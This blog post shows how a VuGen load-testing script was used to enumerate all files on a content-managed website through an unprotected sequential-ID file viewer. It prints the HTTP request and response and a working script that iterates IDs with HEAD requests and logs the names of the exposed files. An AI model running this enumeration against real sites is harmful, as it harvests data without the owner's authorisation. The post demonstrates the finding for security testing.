Harvesting file names with VuGen
VuGen isn’t just a tool for load testing and application monitoring, it can be used to automate any repetitive task on a web application.
In this example, a JDS web security expert had found that a page on a content-managed website allowed anyone to request any file in the database (http://www.example.com/FileViewer/getFile.do?id=1449 ).
It was easy to create a simple VuGen script to compile a list of all the files in the database.
The HTTP request looked like…
1 2 3 4 5 6 7 8 | GET /FileViewer/getFile.do?id=1449 HTTP/1.1 Accept: */* Accept-Language: en-us UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 3.5.30729) Host: www.example.com Connection: Keep-Alive |
The following HTTP response was returned…
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | HTTP/1.1 200 OK Content-Length: 1777617 Cache-Control: private Content-Disposition: download;filename="MBS Axapta V3.0 - Advanced Finance.pdf"; Content-Type: application/pdf Set-Cookie: JSESSIONID=8a4d179c30da5e59; path=/FileViewer Connection: Keep-Alive Keep-Alive: timeout=7, max=999 Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server Last-Modified: Wed, 16 Aug 2006 03:19:45 GMT Date: Tue, 13 Jan 2009 00:03:54 GMT Content-Location: http://www.example.com/FileViewer/WEB-INF/jsps/components/getFile.jsp %PDF-1.3 %\xE2\xE3\xCF\xD3 758 0 obj << /Linearized 1 (the rest of the PDF content in the HTTP response body has been removed) |
As the file name, file size and last modified date was available in the HTTP response header, it is not necessary to download the entire file to compile a list of file names. We can use the HTTP HEAD method instead of GET.
Here is the VuGen script that (after 10000 iterations) saved the information about all the files in the content management system.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 | Action() { char* file = "C:\\TEMP\\content_management_files.txt"; web_reg_save_param("FileName", "LB=Content-Disposition: download;filename=\"", "RB=\";", "Search=Headers", "NotFound=Warning", LAST); web_reg_save_param("FileSize", "LB=Content-Length: ", "RB=\r\n", "Search=Headers", "NotFound=Warning", LAST); web_reg_save_param("FileDate", "LB=Last-Modified: ", "RB=\r\n", "Search=Headers", "NotFound=Warning", LAST); web_custom_request("getFile.do", "URL=http://www.example.com/FileViewer/getFile.do?id={IterationNumber}", "Method=HEAD", "Resource=1", "Referer=", "Snapshot=t1.inf", LAST); // Only save info for valid files if (web_get_int_property(HTTP_INFO_RETURN_CODE) == 200) { jds_append_to_file(file, lr_eval_string("{IterationNumber}\t{FileSize}\t{FileDate}\t{FileName}\n")); } return 0; } |
You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
May 10th, 2009 at 6:20 pm
[...] I’ve said before, VuGen makes a great content scraping tool for cases when you want a quick and dirty script to save [...]
July 17th, 2010 at 9:22 pm
[...] a whole lot of waiting around at airports. Jetlag ensured that I was wide awake at 4am writing a VuGen script to download all the presentations from the conference, and to write this summary for [...]